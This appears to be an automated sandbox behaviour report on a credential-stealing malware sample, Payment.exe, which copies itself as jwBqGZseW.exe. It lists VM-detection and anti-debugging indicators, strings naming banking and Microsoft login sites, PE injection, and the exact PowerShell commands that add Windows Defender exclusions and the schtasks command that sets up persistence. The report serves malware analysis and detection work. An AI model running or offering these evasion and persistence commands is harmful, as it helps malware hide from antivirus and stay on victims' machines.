Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599404
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599296
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598968
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598649
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598320
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597963
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597532
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597422
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597178
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596601
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596373
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596122
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595986
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595542
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594694
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594448
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594342
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594234
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594101
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593891
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593773
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593672

Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual NetLP`
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Spectrum.exe, 0000001B.00000002.2108208802.0000000000567000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Spectrum.exe, 0000001B.00000003.918765946.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2143808453.0000019D59253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2143618359.0000019D5923E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 00000019.00000003.904956749.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918765946.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI
Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: N`SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0I`SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driveresources
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Spectrum.exe, 0000001B.00000002.2111802425.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverJ
Source: AppVClient.exe, 0000000E.00000003.874415639.0000000000607000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000E.00000002.889135611.000000000061E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000E.00000003.873860693.0000000000600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineL
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~p_
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Spectrum.exe, 0000001B.00000003.918765946.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter,&_
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: svchost.exe, 0000002B.00000002.2128529484.0000019D53A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0z`SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Devicebg`
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ssh-agent.exe, 0000001C.00000002.2108373436.0000000000427000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SensorDataService.exe, 00000019.00000003.904956749.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918765946.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: snmptrap.exe, 0000001A.00000002.2108376787.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}Y
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: jwBqGZseW.exe, 00000027.00000002.2124480246.000000000135D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000002.2111802425.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device
Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e`SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000

Source: C:\Users\user\Desktop\Payment.exe

API call chain: ExitProcess graph end node

graph_8-117297

Source: C:\Users\user\Desktop\Payment.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

8_2_00402000

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_0040CE09

Source: C:\Users\user\Desktop\Payment.exe

8_2_00402000

Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00751130 mov eax, dword ptr fs:[00000030h]	23_2_00751130
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00793F3D mov eax, dword ptr fs:[00000030h]	23_2_00793F3D
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_0047D587 mov eax, dword ptr fs:[00000030h]	39_2_0047D587
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_0047D394 mov eax, dword ptr fs:[00000030h]	39_2_0047D394
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_02E51130 mov eax, dword ptr fs:[00000030h]	39_2_02E51130
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_02E93F3D mov eax, dword ptr fs:[00000030h]	39_2_02E93F3D

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_0040ADB0 GetProcessHeap,HeapFree,

8_2_0040ADB0

Source: C:\Users\user\Desktop\Payment.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040CE09
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040E61C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,	8_2_00416F6A
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00791361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00791361
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00794C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00794C7B
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_02E91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_02E91361
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 39_2_02E94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_02E94C7B

Source: C:\Users\user\Desktop\Payment.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQuerySystemInformation: Indirect: 0x9B8462
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtAdjustPrivilegesToken: Indirect: 0x9B864C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payment.exe	Memory written: C:\Users\user\Desktop\Payment.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory written: C:\Users\user\AppData\Roaming\jwBqGZseW.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,

8_2_02E68550

Source: C:\Users\user\Desktop\Payment.exe

Code function: GetLocaleInfoA,

8_2_00417A20

Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Users\user\Desktop\Payment.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
